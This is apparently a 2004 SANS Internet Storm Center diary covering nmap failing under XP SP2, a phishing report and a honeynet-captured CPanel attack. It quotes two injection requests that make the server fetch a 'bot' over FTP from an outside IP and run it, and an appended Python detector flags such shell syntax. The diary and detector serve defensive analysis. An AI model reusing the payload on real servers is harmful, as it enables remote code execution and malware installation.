SANS ISC: SP2 breaks nmap, others - *Anti*phishing - Application exploits (SANS Internet Storm Center, InfoSec Forums)


nmap non-functional under XP SP2

The extremely popular port-scanner "nmap" became an early victim of XP SP2 today when Fyodor, nmap's author, announced that the tool does not function under Windows XP Service Pack 2. This is due to the removal of XP's innate ability to send TCP packets over "raw" sockets. This is likely a temporary situation, as nmap is fully functional on platforms without native raw socket support.

http://seclists.org/lists/nmap-hackers/2004/Jul-Sep/0002.html

Remember, we're still sharing our SP2 experiences at the following link:

http://isc.sans.org/xpsp2.php

Antiphishing.org report for June

Since it wouldn't be a proper handler's diary without something phishing related ... Antiphishing.org has released their monthly report outlining which companies were targeted by phishing attacks most often, which countries hosted the most phishing sites, the average lifespan of a phishing hole, and many more interesting findings.*

http://www.antiphishing.org/APWG_Phishing_Attack_Report-Jun2004.pdf

CPanel Exploits

One of our handlers caught an attempted CPanel exploit in his honeynet, and posed a request for additional CPanel exploit traffic. Here's what the handler saw:

GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';echo${BLA}-e${BLA}
open${BLA}64.222.183.58${BLA10723\\nuser${BLA}ftp${BLA}bla\\nget${BLA}bot
\\nquit\\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0

followed by the execution:

GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0

I'd like to extend the request to include all kinds of application level attacks. As we slowly but surely develop defenses against the classical stack-smashing attacks (and hopefully begin coding in such a way where they become irrelevant), application level attacks will become increasingly profitable to the attacker. Besides the (usually) softer target, application attacks have the added benefit of frequently slipping past the classical perimeter defense mechanisms of traditional IDS and firewalls. Furthermore, by popping a service and rooting a box, the attacker simply owns the box - but, if the attacker can successfully exploit application level flaws, he or she can own the *data*, which more often than not is a much more valuable prize.

====================

Cory Altheide

Handler on Duty

====================


*Just to clarify, I mean that there are many more findings that are interesting, not many other findings that are more interesting than the ones I've mentioned already. I really wish the English language allowed for the use of parentheses in the manner algebra does = (many more) (interesting findings) vs. many (more interesting findings).
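
A defender-side check for the request pattern quoted in the diary above, as an added example that is not part of the original diary or of any SANS tooling: it percent-decodes each query parameter (repeatedly, to expose double encoding) and flags shell syntax such as the pipe/backtick wrapper seen in the user parameter. The function names, the metacharacter list and the sample request lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Shell syntax that has no place in a username-style parameter:
# pipe, backtick, semicolon, $'..' quoting, ${VAR} and $(cmd).
SHELL_META = re.compile(r"[|`;]|\$['({]")
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded characters are also exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(request_line):
    """Return [(path, name, decoded_value)] for query parameters carrying shell syntax."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    hits = []
    # Split on '&' only: the requests in the diary carry raw ';' inside the
    # value, and treating ';' as a separator would cut the value short.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = decode_fully(raw)
        if name and SHELL_META.search(value):
            hits.append((parts.path, name, value))
    return hits


# Constructed sample request lines (not captured traffic).
SAMPLES = [
    "GET /resetpass/?user=alice HTTP/1.0",
    "GET /resetpass/?user=%7C%60X=$'\\x20';echo${X}test%60%7C HTTP/1.0",
    "GET /resetpass/?user=%257C%2560date%2560%257C HTTP/1.0",
    "GET /search?q=nmap+sp2&page=2 HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        for path, name, value in suspicious_params(line):
            print(f"ALERT {path} param={name!r} decoded={value!r}")
```

Matching on the decoded value is the point: in the captured requests the pipe and backtick arrive as %7C and %60, so a signature written against the raw characters never sees them.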